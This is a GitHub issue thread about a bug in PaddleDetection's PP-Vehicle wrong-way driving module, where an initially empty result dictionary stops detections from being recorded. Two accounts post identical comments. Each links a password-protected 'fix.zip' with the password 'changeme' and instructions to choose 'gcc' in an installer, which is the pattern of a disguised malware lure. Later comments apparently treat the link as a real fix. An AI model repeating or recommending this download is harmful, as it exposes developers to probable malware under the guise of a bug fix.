### ISSUE TITLE
PP-Vehicle车辆逆行识别模块，推理逆行无法识别出来逆行

### ISSUE THREAD

**Issue by yanyide123** [PaddlePaddle/PaddleDetection#9115]
### 问题确认 Search before asking

- [X] 我已经查询[历史issue](https://github.com/PaddlePaddle/PaddleDetection/issues)，没有发现相似的bug。I have searched the [issues](https://github.com/PaddlePaddle/PaddleDetection/issues) and found no similar bug report.

### Bug组件 Bug Component

Inference

### Bug描述 Describe the Bug

pipeline中的代码
初始化的retrograde_res_update，一开始的get的vehicle_retrograde'字典信息，一开始肯定是空的
    def get(self, name):
        if name in self.res_dict and len(self.res_dict[name]) > 0:
            return self.res_dict[name]
        return None
这是get的判单逻辑
self.res_dict = {
            'det': dict(),
            'mot': dict(),
            'attr': dict(),
            'kpt': dict(),
            'video_action': dict(),
            'skeleton_action': dict(),
            'reid': dict(),
            'det_action': dict(),
            'cls_action': dict(),
            'vehicleplate': dict(),
            'vehicle_attr': dict(),
            'lanes': dict(),
            'vehicle_press': dict(),
            'vehicle_retrograde': dict()
        }
这个是初始的空字典，那初始retrograde_res_update 也是空的，这样逻辑就行不同，识别出来的retrograde_res添加不进去，没有意义，所以提交代码识别不出逆行
retrograde_res, fence_line = self.vehicle_retrograde_predictor.mot_run(
                        lanes_res=retrograde_lanes,
                        det_res=retrograde_mot_res,
                        frame_shape=frame_shape)

retrograde_res_update = self.pipeline_res.get(
                        'vehicle_retrograde')

if retrograde_res_update is not None:
    retrograde_res_update = retrograde_res_update['output']
    if retrograde_res is not None:
        for retrograde_res_id in retrograde_res:
            if retrograde_res_id not in retrograde_res_update:
                retrograde_res_update.append(
                    retrograde_res_id)
else:
    retrograde_res_update = []

### 复现环境 Environment

环境没有问题

### Bug描述确认 Bug description confirmation

- [X] 我确认已经提供了Bug复现步骤、代码改动说明、以及环境信息，确认问题是可以复现的。I confirm that the bug replication steps, code change instructions, and environment information have been provided, and the problem can be reproduced.

### 是否愿意提交PR？ Are you willing to submit a PR?

- [X] 我愿意提交PR！I'd like to help by submitting a PR!

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yanyide123** [comment]
> 下载 https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

这可以解决问题？

**Comment by changdazhou** [comment]
可以参考解决一下哈

> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

**Comment by changdazhou** [comment]
方便的话可以提交PR我们会review哈

**Comment by TingquanGao** [comment]
The issue has no response for a long time and will be closed. You can reopen or new another issue if are still confused.

---
_From Bot_
